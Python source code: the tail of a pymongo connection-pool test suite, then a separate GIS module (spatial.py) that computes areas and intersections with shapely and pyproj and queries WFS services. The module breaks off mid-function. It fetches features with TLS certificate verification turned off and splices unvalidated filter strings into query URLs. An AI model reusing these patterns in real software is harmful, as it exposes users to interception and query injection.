self.assertEqual(sock_info, cx_pool._get_request_state())
# Unlike in test_pool_removes_dead_request_socket_after_1_sec, we
# set sock_info.closed and *don't* wait 1 second
sock_info.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket_after_request(self):
# Test that Pool handles a socket dying that *used* to be the request
# socket.
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
# End request
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
# Kill old request socket
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
time.sleep(1.1) # trigger _check_closed
# Dead socket detected and removed
new_sock_info = cx_pool.get_socket()
self.assertFalse(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(0, len(cx_pool.sockets))
self.assertFalse(pymongo.pool._closed(new_sock_info.sock))
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_socket_reclamation(self):
if sys.platform.startswith('java'):
raise SkipTest("Jython can't do socket reclamation")
# Check that if a thread starts a request and dies without ending
# the request, that the socket is reclaimed into the pool.
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False,
)
self.assertEqual(0, len(cx_pool.sockets))
lock = None
the_sock = [None]
def leak_request():
self.assertEqual(NO_REQUEST, cx_pool._get_request_state())
cx_pool.start_request()
self.assertEqual(NO_SOCKET_YET, cx_pool._get_request_state())
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
the_sock[0] = id(sock_info.sock)
cx_pool.maybe_return_socket(sock_info)
if not self.use_greenlets:
lock.release()
if self.use_greenlets:
g = Greenlet(leak_request)
g.start()
g.join(1)
self.assertTrue(g.ready(), "Greenlet is hung")
else:
lock = thread.allocate_lock()
lock.acquire()
# Start a thread WITHOUT a threading.Thread - important to test that
# Pool can deal with primitive threads.
thread.start_new_thread(leak_request, ())
# Join thread
acquired = lock.acquire()
self.assertTrue(acquired, "Thread is hung")
# Make sure thread is really gone
time.sleep(1)
if 'PyPy' in sys.version:
gc.collect()
# Access the thread local from the main thread to trigger the
# ThreadVigil's delete callback, returning the request socket to
# the pool.
# In Python 2.6 and lesser, a dead thread's locals are deleted
# and those locals' weakref callbacks are fired only when another
# thread accesses the locals and finds the thread state is stale.
# This is more or less a bug in Python <= 2.6. Accessing the thread
# local from the main thread is a necessary part of this test, and
# realistic: in a multithreaded web server a new thread will access
# Pool._local soon after an old thread has died.
getattr(cx_pool._local, 'whatever', None)
# Pool reclaimed the socket
self.assertEqual(1, len(cx_pool.sockets))
self.assertEqual(the_sock[0], id(one(cx_pool.sockets).sock))
class _TestMaxPoolSize(_TestPoolingBase):
"""Test that connection pool keeps proper number of idle sockets open,
no matter how start/end_request are called. To be applied both to Pool and
GreenletPool.
"""
def _test_max_pool_size(self, start_request, end_request):
c = self.get_connection(max_pool_size=4, auto_start_request=False)
# If you increase nthreads over about 35, note a
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a Connection. Apparently fixed in
# recent Gevent development.
nthreads = 10
rendevous = CreateAndReleaseSocket.Rendezvous(
nthreads, self.use_greenlets)
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocket(
self, c, start_request, end_request, rendevous)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for t in threads:
self.assertTrue(t.passed)
# Socket-reclamation doesn't work in Jython
if not sys.platform.startswith('java'):
cx_pool = c._Connection__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
if start_request:
self.assertEqual(4, len(cx_pool.sockets))
else:
# Without calling start_request(), threads can safely share
# sockets; the number running concurrently, and hence the number
# of sockets needed, is between 1 and 10, depending on thread-
# scheduling.
self.assertTrue(len(cx_pool.sockets) >= 1)
def test_max_pool_size(self):
self._test_max_pool_size(0, 0)
def test_max_pool_size_with_request(self):
self._test_max_pool_size(1, 1)
def test_max_pool_size_with_redundant_request(self):
self._test_max_pool_size(2, 1)
self._test_max_pool_size(20, 1)
def test_max_pool_size_with_leaked_request(self):
# Call start_request() but not end_request() -- when threads die, they
# should return their request sockets to the pool.
self._test_max_pool_size(1, 0)
def test_max_pool_size_with_end_request_only(self):
# Call end_request() but not start_request()
self._test_max_pool_size(0, 1)
class _TestPoolSocketSharing(_TestPoolingBase):
"""Directly test that two simultaneous operations don't share a socket. To
be applied both to Pool and GreenletPool.
"""
def _test_pool(self, use_request):
"""
Test that the connection pool prevents both threads and greenlets from
using a socket at the same time.
Sequence:
gr0: start a slow find()
gr1: start a fast find()
gr1: get results
gr0: get results
"""
cx = get_connection(
use_greenlets=self.use_greenlets,
auto_start_request=False
)
db = cx.pymongo_test
db.test.remove(safe=True)
db.test.insert({'_id': 1}, safe=True)
history = []
def find_fast():
if use_request:
cx.start_request()
history.append('find_fast start')
# With greenlets and the old connection._Pool, this would throw
# AssertionError: "This event is already used by another
# greenlet"
self.assertEqual({'_id': 1}, db.test.find_one())
history.append('find_fast done')
if use_request:
cx.end_request()
def find_slow():
if use_request:
cx.start_request()
history.append('find_slow start')
# Javascript function that pauses N seconds per document
fn = delay(10)
if (is_mongos(db.connection) or not
version.at_least(db.connection, (1, 7, 2))):
# mongos doesn't support eval so we have to use $where
# which is less reliable in this context.
self.assertEqual(1, db.test.find({"$where": fn}).count())
else:
# 'nolock' allows find_fast to start and finish while we're
# waiting for this to complete.
self.assertEqual({'ok': 1.0, 'retval': True},
db.command('eval', fn, nolock=True))
history.append('find_slow done')
if use_request:
cx.end_request()
if self.use_greenlets:
gr0, gr1 = Greenlet(find_slow), Greenlet(find_fast)
gr0.start()
gr1.start_later(.1)
else:
gr0 = threading.Thread(target=find_slow)
gr0.setDaemon(True)
gr1 = threading.Thread(target=find_fast)
gr1.setDaemon(True)
gr0.start()
time.sleep(.1)
gr1.start()
gr0.join()
gr1.join()
self.assertEqual([
'find_slow start',
'find_fast start',
'find_fast done',
'find_slow done',
], history)
def test_pool(self):
self._test_pool(use_request=False)
def test_pool_request(self):
self._test_pool(use_request=True)
|
spatial.py
|
import bottle
#import os
import sys
import requests
import json
import pyproj
import traceback
import math
#from datetime import datetime
from multiprocessing import Process, Pipe
from shapely.geometry import shape,MultiPoint,Point,mapping
from shapely.geometry.polygon import Polygon
from shapely.geometry.multipolygon import MultiPolygon
from shapely.geometry.collection import GeometryCollection
from shapely.geometry.base import BaseGeometry
from shapely import ops
from functools import partial
import settings
import kmi
proj_aea = lambda geometry: pyproj.Proj("+proj=aea +lat_1=-17.5 +lat_2=-31.5 +lat_0=0 +lon_0=121 +x_0=5000000 +y_0=10000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs")
def exportGeojson(feat,fname):
if isinstance(feat,BaseGeometry):
geojson = {
"type":"FeatureCollection",
"features":[
{
"type":"Feature",
"geometry":mapping(feat),
"properties":{}
}
]
}
elif isinstance(feat,tuple):
geojson = {
"type":"FeatureCollection",
"features":[
{
"type":"Feature",
"geometry":mapping(feat[0]),
"properties":feat[1] or {}
}
]
}
elif isinstance(feat,list):
features = []
geojson = {
"type":"FeatureCollection",
"features":features
}
for f in feat:
if isinstance(f,BaseGeometry):
features.append({
"type":"Feature",
"geometry":mapping(f),
"properties":{}
})
elif isinstance(f,tuple):
features.append({
"type":"Feature",
"geometry":mapping(f[0]),
"properties":f[1] or {}
})
else:
raise Exception("Unsupported type({}.{})".format(f.__class__.__module__,f.__class__.__name__))
else:
raise Exception("Unsupported type({}.{})".format(feat.__class__.__module__,feat.__class__.__name__))
with open(fname,'w') as f:
f.write(json.dumps(geojson,indent=True))
return fname
proj_wgs84 = pyproj.Proj(init='epsg:4326')
def buffer(lon, lat, meters,resolution=16):
"""
Create a buffer around a point
"""
# Azimuthal equidistant projection
aeqd_proj = '+proj=aeqd +lat_0={} +lon_0={} +x_0=0 +y_0=0'
project = partial(
pyproj.transform,
pyproj.Proj(aeqd_proj.format(lat, lon)),
proj_wgs84)
buf = Point(0, 0).buffer(meters,resolution=resolution) # distance in metres
return ops.transform(project, buf).exterior.coords[:]
def getShapelyGeometry(feature):
if not feature["geometry"]:
return None
elif feature["geometry"]["type"] == "GeometryCollection":
return GeometryCollection([shape(g) for g in feature["geometry"]["geometries"]])
else:
return shape(feature["geometry"])
def transform(geometry,src_proj="EPSG:4326",target_proj='aea'):
if src_proj == target_proj:
return geometry
else:
if src_proj == 'aea':
src_proj = proj_aea(geometry)
else:
src_proj = pyproj.Proj(init=src_proj)
if target_proj == 'aea':
target_proj = proj_aea(geometry)
else:
target_proj = pyproj.Proj(init=target_proj)
return ops.transform(
partial(
pyproj.transform,
src_proj,
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
#use projection 'Albers Equal Conic Area for WA' to calcuate the area
target_proj
),
geometry
)
def getGeometryArea(geometry,unit,src_proj="EPSG:4326"):
"""
Get polygon's area using albers equal conic area
"""
if src_proj == 'aea':
geometry_aea = geometry
else:
geometry_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=src_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
#use projection 'Albers Equal Conic Area for WA' to calcuate the area
proj_aea(geometry)
),
geometry
)
data = geometry_aea.area
if unit == "ha" :
return data / 10000.00
elif unit == "km2":
return data / 1000000.00
else:
return data
degrees2radians = math.pi / 180
radians2degrees = 180 /math.pi
def getBearing(p1,p2):
lon1 = degrees2radians * p1.x
lon2 = degrees2radians * p2.x
lat1 = degrees2radians * p1.y
lat2 = degrees2radians * p2.y
a = math.sin(lon2 - lon1) * math.cos(lat2)
b = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(lon2 - lon1);
bearing = radians2degrees * math.atan2(a, b);
return bearing if bearing >= 0 else bearing + 360
directions = {
4:[360/4,math.floor(360 / 8 * 100) / 100,["N","E","S","W"]],
8:[360/8,math.floor(360 / 16 * 100) / 100,["N","NE","E","SE","S","SW","W","NW"]],
16:[360/16,math.floor(360 / 32 * 100) / 100,["N","NNE","NE","ENE","E","ESE","SE","SSE","S","SSW","SW","WSW","W","WNW","NW","NNW"]],
32:[360/32,math.floor(360 / 64 * 100) / 100,["N","NbE","NNE","NEbN","NE","NEbE","ENE","EbN","E","EbS","ESE","SEbE","SE","SEbS","SSE","SbE","S","SbW","SSW","SWbS","SW","SWbW","WSW","WbS","W","WbN","WNW","NWbW","NW","NWbN","NNW","NbW"]],
}
def getDirection(bearing,mode = 16):
mode = mode or 16
if mode not in directions:
mode = 16
index = int((math.floor(bearing / directions[mode][0]) + 0 if ((round(bearing % directions[mode][0],2) <= directions[mode][1])) else 1) % mode)
return directions[mode][2][index]
def getDistance(p1,p2,unit="m",p1_proj="EPSG:4326",p2_proj="EPSG:4326"):
if p1_proj == 'aea':
p1_aea = p1
else:
p1_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=p1_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
#use projection 'Albers Equal Conic Area for WA' to calcuate the area
proj_aea(p1)
),
p1
)
if p2_proj == 'aea':
p2_aea = p2
else:
p2_aea = ops.transform(
partial(
pyproj.transform,
pyproj.Proj(init=p2_proj),
#pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3])
#use projection 'Albers Equal Conic Area for WA' to calcuate the area
proj_aea(p2)
),
p2
)
data = p1_aea.distance(p2_aea)
if unit == "km" :
return data / 1000.00
else:
return data
#return polygon or multipolygons if have, otherwise return None
def extractPolygons(geom):
if not geom:
return None
elif isinstance(geom,Polygon) or isinstance(geom,MultiPolygon):
return geom
elif isinstance(geom,GeometryCollection):
result = None
for g in geom:
p = extractPolygons(g)
if not p:
continue
elif not result:
result = p
elif isinstance(result,MultiPolygon):
result = [geom1 for geom1 in result.geoms]
if isinstance(p,Polygon):
result.append(p)
result = MultiPolygon(result)
else:
for geom1 in p.geoms:
result.append(geom1)
result = MultiPolygon(result)
else:
if isinstance(p,Polygon):
result = MultiPolygon([result,p])
else:
result = [result]
for geom1 in p.geoms:
result.append(geom1)
result = MultiPolygon(result)
return result
else:
return None
def extractPoints(geom):
if isinstance(geom,Point) or isinstance(geom,MultiPoint):
return geom
elif isinstance(geom,GeometryCollection):
result = None
for g in geom:
p = extractPoints(g)
if not p:
continue
elif not result:
result = p
elif isinstance(result,MultiPoint):
result = [geom1 for geom1 in result.geoms]
if isinstance(p,Point):
result.append(p)
result = MultiPoint(result)
else:
for geom1 in p.geoms:
result.append(geom1)
result = MultiPoint(result)
else:
if isinstance(p,Point):
result = MultiPoint([result,p])
else:
result = [result]
for geom1 in p.geoms:
result.append(geom1)
result = MultiPoint(result)
return result
else:
return None
def retrieveFeatures(url,session_cookies):
res = requests.get(url,verify=False,cookies=session_cookies)
res.raise_for_status()
return res.json()
def checkOverlap(session_cookies,feature,options,logfile):
# needs gdal 1.10+
layers = options["layers"]
geometry = extractPolygons(getShapelyGeometry(feature))
if not geometry :
return
features = {}
#retrieve all related features from layers
for layer in layers:
if layer.get('cqlfilter'):
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter'])
else:
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2])
features[layer["id"]] = retrieveFeatures(layer_url, session_cookies)["features"]
for layer_feature in features[layer["id"]]:
layer_geometry = getShapelyGeometry(layer_feature)
layer_feature["geometry"] = layer_geometry
#check whether the features from different layers are overlap or not
layergroup_index1 = 0
while layergroup_index1 < len(layers) - 1:
layer1 = layers[layergroup_index1]
layergroup_index1 += 1
layer_features1 = features[layer1["id"]]
#check whether layer's features are overlap or not.
feature_index1 = 0
while feature_index1 < len(layer_features1):
feature1 = layer_features1[feature_index1]
feature_index1 += 1
feature_geometry1 = feature1["geometry"]
if not isinstance(feature_geometry1,Polygon) and not isinstance(feature_geometry1,MultiPolygon):
continue
layergroup_index2 = layergroup_index1
while layergroup_index2 < len(layers):
layer2 = layers[layergroup_index2]
layergroup_index2 += 1
layer_features2 = features[layer2["id"]]
feature_index2 = 0
while feature_index2 < len(layer_features2):
feature2 = layer_features2[feature_index2]
feature_index2 += 1
feature_geometry2 = feature2["geometry"]
feature_geometry1 = feature1["geometry"]
if not isinstance(feature_geometry2,Polygon) and not isinstance(feature_geometry2,MultiPolygon):
continue
intersections = extractPolygons(feature_geometry1.intersection(feature_geometry2))
if not intersections:
continue
layer1_pk = layer1.get("primary_key")
layer2_pk = layer2.get("primary_key")
if layer1_pk:
if isinstance(layer1_pk,basestring):
feat1 = "{}({}={})".format(layer1["layerid"],layer1_pk,feature1["properties"][layer1_pk])
else:
feat1 = "{}({})".format(layer1["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature1["properties"].iteritems() if k in layer1_pk ]))
else:
feat1 = "{}({})".format(layer1["layerid"],json.dumps(feature1["properties"]))
if layer2_pk:
if isinstance(layer2_pk,basestring):
feat2 = "{}({}={})".format(layer2["layerid"],layer2_pk,feature2["properties"][layer2_pk])
else:
feat2 = "{}({})".format(layer2["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature2["properties"].iteritems() if k in layer2_pk ]))
else:
feat2 = "{}({})".format(layer2["layerid"],json.dumps(feature2["properties"]))
msg = "intersect({}, {}) = {} ".format( feat1,feat2, intersections )
with open(logfile,"a") as f:
f.write(msg)
f.write("\n")
def calculateArea(feature,session_cookies,options):
"""
return:{
status {
"invalid" : invalid message;
"failed" : failed message;
"overlapped" : overlap message
}
data: {
total_area: 100 //exist if status_code = 1
other_area: 10 //exist if status_code = 1 and len(layers) > 0
layers: { //exist if status_code = 1 and len(layers) > 0
layer id: {
total_area: 12
areas:[
{area:1, properties:{
name:value
}}
]
}
}
}
}
The reason to calculate the area in another process is to releace the memory immediately right after area is calculated.
"""
if not settings.CALCULATE_AREA_IN_SEPARATE_PROCESS:
return _calculateArea(feature,session_cookies,options,False)
parent_conn,child_conn = Pipe(True)
p = Process(target=calculateAreaInProcess,args=(child_conn,))
p.daemon = True
p.start()
parent_conn.send([feature,session_cookies,options])
result = parent_conn.recv()
parent_conn.close()
#p.join()
#print("{}:get the area result from other process".format(datetime.now()))
return result
def calculateAreaInProcess(conn):
feature,session_cookies,options = conn.recv()
result = _calculateArea(feature,session_cookies,options,True)
if "overlap_logfile" in result:
overlapLogfile = result["overlap_logfile"]
del result["overlap_logfile"]
else:
overlapLogfile = None
conn.send(result)
conn.close()
#print("{}:Calculating area finiahed".format(datetime.now()))
#import time
#time.sleep(30)
#if overlapLogfile:
# try:
# if os.path.exists(overlapLogfile):
# os.remove(overlapLogfile)
# except:
# pass
# checkOverlap(session_cookies,feature,options,overlapLogfile)
#print("{}:subprocess finished".format(datetime.now()))
def calculateFeatureArea(feature,src_proj="EPSG:4326",unit='ha'):
return calculateGeometryArea(getShapelyGeometry(feature),src_proj=src_proj,unit=unit)
def calculateGeometryArea(geometry,src_proj="EPSG:4326",unit='ha'):
geometry = extractPolygons(geometry)
if not geometry :
return 0
valid,msg = geometry.check_valid
if not valid:
print("geometry is invalid.{}", msg)
geometry_aea = transform(geometry,src_proj=src_proj,target_proj='aea')
return getGeometryArea(geometry_aea,unit,'aea')
def _calculateArea(feature,session_cookies,options,run_in_other_process=False):
# needs gdal 1.10+
layers = options["layers"]
unit = options["unit"] or "ha"
overlap = options["layer_overlap"] or False
merge_result = options.get("merge_result",False)
area_data = {}
status = {}
result = {"status":status,"data":area_data}
total_area = 0
total_layer_area = 0
geometry = extractPolygons(getShapelyGeometry(feature))
if not geometry :
area_data["total_area"] = 0
return result
#before calculating area, check the polygon first.
#if polygon is invalid, throw exception
valid,msg = geometry.check_valid
if not valid:
status["invalid"] = msg
geometry_aea = transform(geometry,target_proj='aea')
try:
area_data["total_area"] = getGeometryArea(geometry_aea,unit,'aea')
except:
traceback.print_exc()
if "invalid" in status:
status["failed"] = "Calculate total area failed.{}".format("\r\n".join(status["invalid"]))
else:
status["failed"] = "Calculate total area failed.{}".format(traceback.format_exception_only(sys.exc_type,sys.exc_value))
return result
if not layers:
return result
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export geometry for debug
properties = feature["properties"]
properties.update({"area":area_data["total_area"]})
exportGeojson((geometry_aea,properties),"/tmp/feature.geojson")
for layer in layers:
if "layerid" not in layer and "id" not in layer:
raise Exception("Both 'id' and 'layerid' are missing in layer declaration")
elif "layerid" not in layer:
layer["layerid"] = layer["id"]
elif "id" not in layer:
layer["id"] = layer["layerid"]
if not layer.get("kmiservice"):
layer["kmiservice"] = settings.KMI_SERVER
area_data["layers"] = {}
areas_map = {} if merge_result else None
for layer in layers:
try:
layer_area_data = []
total_layer_area = 0
area_data["layers"][layer["id"]] = {"areas":layer_area_data}
if layer.get('cqlfilter'):
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter'])
else:
layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2])
#print(layer_url)
layer_features = retrieveFeatures(layer_url,session_cookies)["features"]
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
intersected_features = []
intersected_layer_features = []
for layer_feature in layer_features:
layer_geometry = getShapelyGeometry(layer_feature)
if not layer_geometry.is_valid:
layer_geometry = layer_geometry.buffer(0) #Times out if reserves is a single massive poly
# return {"status":"failed","data":"invalid polygon in tenure layer, probably the other_tenures layer"}
layer_geometry = transform(layer_geometry,target_proj='aea')
if not isinstance(layer_geometry,Polygon) and not isinstance(layer_geometry,MultiPolygon):
continue
intersections = extractPolygons(geometry_aea.intersection(layer_geometry))
if not intersections:
continue
layer_feature_area_data = None
#try to get the area data from map
if merge_result:
area_key = []
for key,value in layer["properties"].iteritems():
area_key.append(layer_feature["properties"][value])
area_key = tuple(area_key)
layer_feature_area_data = areas_map.get(area_key)
if not layer_feature_area_data:
#map is not enabled,or data does not exist in map,create a new one
layer_feature_area_data = {"area":0}
for key,value in layer["properties"].iteritems():
layer_feature_area_data[key] = layer_feature["properties"][value]
layer_area_data.append(layer_feature_area_data)
if merge_result:
#save it into map
areas_map[area_key] = layer_feature_area_data
feature_area = getGeometryArea(intersections,unit,src_proj='aea')
layer_feature_area_data["area"] += feature_area
total_layer_area += feature_area
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
properties = layer_feature["properties"]
properties.update({"area":feature_area})
intersected_features.append((intersections,properties))
intersected_layer_features.append((layer_geometry,properties))
if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG:
#export intersected areas for debug
if intersected_features:
for feat in intersected_features:
feat[1].update({"total_area":total_layer_area})
exportGeojson(intersected_features,'/tmp/feature_area_{}_intersection.geojson'.format(layer["id"]))
exportGeojson(intersected_layer_features,'/tmp/feature_area_{}.geojson'.format(layer["id"]))
area_data["layers"][layer["id"]]["total_area"] = total_layer_area
total_area += total_layer_area
if not overlap and total_area >= area_data["total_area"] :
break
except:
traceback.print_exc()
status["failed"] = "Calculate intersection area between fire boundary and layer '{}' failed.{}".format(layer["layerid"] or layer["id"],traceback.format_exception_only(sys.exc_type,sys.exc_value))
break
if "failed" in status:
#calcuating area failed
return result
if not overlap :
area_data["other_area"] = area_data["total_area"] - total_area
if area_data["other_area"] < -0.01: #tiny difference is allowed.
#some layers are overlap
if not settings.CHECK_OVERLAP_IF_CALCULATE_AREA_FAILED:
status["overlapped"] = "The sum({0}) of the burning areas in individual layers are ({2}) greater than the total burning area({1}).\r\n The features from layers({3}) are overlaped, please check.".format(round(total_area,2),round(area_data["total_area"],2),round(math.fabs(area_data["other_area"]),2),", ".join([layer["id"] for layer in layers]))
else:
filename = "/tmp/overlap_{}.log".format(feature["properties"].get("id","feature"))
status["overlapped"] = "Features from layers are overlaped,please check the log file in server side '{}'".format(filename)
if run_in_other_process:
result["overlap_logfile"] = filename
else:
checkOverlap(session_cookies,feature,options,filename)
return result
def layermetadata(layer):
if not layer.get("_layermetadata"):
layer["_layermetadata"] = kmi.get_layermetadata(layer["layerid"],kmiserver=layer["kmiservice"])
return layer["_layermetadata"]
def layerdefinition(layer):
if not layer.get("_layerdefinition"):
layerdefinition = kmi.get_layerdefinition(layer["layerid"],kmiserver=layer["kmiservice"])
layer["_layerdefinition"] = layerdefinition
else:
layerdefinition = layer["_layerdefinition"]
if not layerdefinition["geometry_property"]:
if layerdefinition["geometry_property_msg"]:
raise Exception(layerdefinition["geometry_property_msg"])
elif not layerdefinition["geometry_properties"]:
raise Exception("The layer '{}' is not a spatial layer".format(layer["layerid"]))
else:
raise Exception("Failed to identify the geometry property of the layer '{}'".format(layer["layerid"]))
return layerdefinition
def getFeature(feature,session_cookies,options):
"""
options:{
format: properties or geojson//optional default is properties
action: getFeature or getIntersectedFeatures or getClosestFeature
layers:[
{
id: //if missing, use 'layerid' as id
layerid: //layerid in kmi, in most cases, layerid is equal with id, if missing, use 'id' as layerid
kmiservice: //optinoal,
properties:{ //optional
name:column in dataset
}
},
...
]
}
getFeature result:[
{
id:
layer:
failed: message if failed; otherwise is null
properties: {
name:value
}
},
]
"""
# needs gdal 1.10+
layers = options["layers"]
#check whether layers is not empty
if not layers:
raise Exception("Layers must not be empty.")
#check whether layers is list
if not isinstance(layers,(list,tuple)):
raise Exception("Layers must be list type.")
#layers must be list of layers
if not isinstance(layers,(list,tuple)):
layers = [layers]
for layer in layers:
if "layerid" not in layer and "id" not in layer:
raise Exception("Both 'id' and 'layerid' are missing in layer declaration")
elif "layerid" not in layer:
layer["layerid"] = layer["id"]
elif "id" not in layer:
layer["id"] = layer["layerid"]
if not layer.get("kmiservice"):
layer["kmiservice"] = settings.KMI_SERVER
get_feature_data = {"id":None,"layer":None,"failed":None}
geometry = getShapelyGeometry(feature)
try:
for layer in layers:
if not layer or not layer.get("kmiservice") or not layer["layerid"]:
continue
if layer.get('check_bbox'):
#check whether feature is in layer's bbox
layer_bbox = layermetadata(layer).get("latlonBoundingBox_EPSG:4326") or layermetadata(layer).get("latlonBoundingBox")
if not layer_bbox:
get_feature_data["failed"] = "Can't find layer({})'s bounding box for epsg:4326".format(layer["layerid"])
break
#buffered_bbox is lonlatboundingbox
if layer.get("buffer") and isinstance(geometry,Point):
checking_bbox = Polygon(buffer(geometry.x,geometry.y,layer["buffer"][-1] if isinstance(layer["buffer"],(list,tuple)) else layer["buffer"],resolution=1)).bounds
else:
checking_bbox = geometry.bounds
if checking_bbox[2] < layer_bbox[1] or checking_bbox[0] > layer_bbox[3] or checking_bbox[3] < layer_bbox[0] or checking_bbox[1] > layer_bbox[2]:
#not in this layer's bounding box
continue
if options["action"] == "getFeature":
get_feature_data["feature"] = None
if isinstance(geometry,Point):
if layerdefinition(layer)["geometry_type"] in ["point",'multipoint']:
get_feature_data["failed"] = "The {1} layer '{0}' doesn't support action '{2}'. ".format(layer["layerid"],layerdefinition(layer)["geometry_property"]["localType"],options["action"])
break
else:
#polygon or line
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=CONTAINS({},POINT({} {}))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.y,geometry.x),
session_cookies
)["features"]
else:
get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"])
break
elif options["action"] == "getIntersectedFeatures":
get_feature_data["features"] = None
if isinstance(geometry,Point):
if not layer.get("buffer"):
get_feature_data["failed"] = "'buffer' is missing in layer '{}'".format(layer["id"])
break
buff_polygon = Polygon(buffer(geometry.x,geometry.y,layer["buffer"]))
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(buff_polygon.exterior.coords)])),
session_cookies
)["features"]
elif isinstance(geometry,Polygon):
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(geometry.exterior.coords)])),
session_cookies
)["features"]
else:
get_feature_data["failed"] = "Action '{}' Only support Point and Polygon geometry.".format(options["action"])
break
elif options["action"] == "getClosestFeature":
get_feature_data["feature"] = None
layer_feature = None
if not isinstance(geometry,Point):
get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"])
break
#should get the grid data at the first try, if can't, set the grid data to null.
for buff in layer["buffer"] if isinstance(layer["buffer"],(list,tuple)) else [layer["buffer"]]:
buff_bbox = Polygon(buffer(geometry.x,geometry.y,buff)).bounds
layer_features = retrieveFeatures(
"{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{},urn:ogc:def:crs:EPSG:4326".format(layer["kmiservice"],layer["layerid"],buff_bbox[1],buff_bbox[0],buff_bbox[3],buff_bbox[2]),
session_cookies
)["features"]
if len(layer_features) == 1:
layer_feature = layer_features[0]
break
elif len(layer_features) > 1:
layer_feature = None
minDistance = None
for feat in layer_features:
if layer_feature is None:
layer_feature = feat
minDistance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326")
else:
distance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326")
if minDistance > distance:
minDistance = distance
layer_feature = feat
break
if layer_feature:
layer_features = [layer_feature]
else:
get_feature_data["failed"] = "Action '{}' Not Support".format(options["action"])
break
if layer_features:
if "feature" in get_feature_data and len(layer_features) > 1:
get_feature_data["failed"] = "Found {1} features in layer '{0}' ".format(layer["layerid"],len(layer_features))
break
if layer_features:
get_feature_data["id"] = layer["id"]
get_feature_data["layer"] = layer["layerid"]
for layer_feature in layer_features:
feat = {}
if layer.get("properties"):
for name,column in layer["properties"].iteritems():
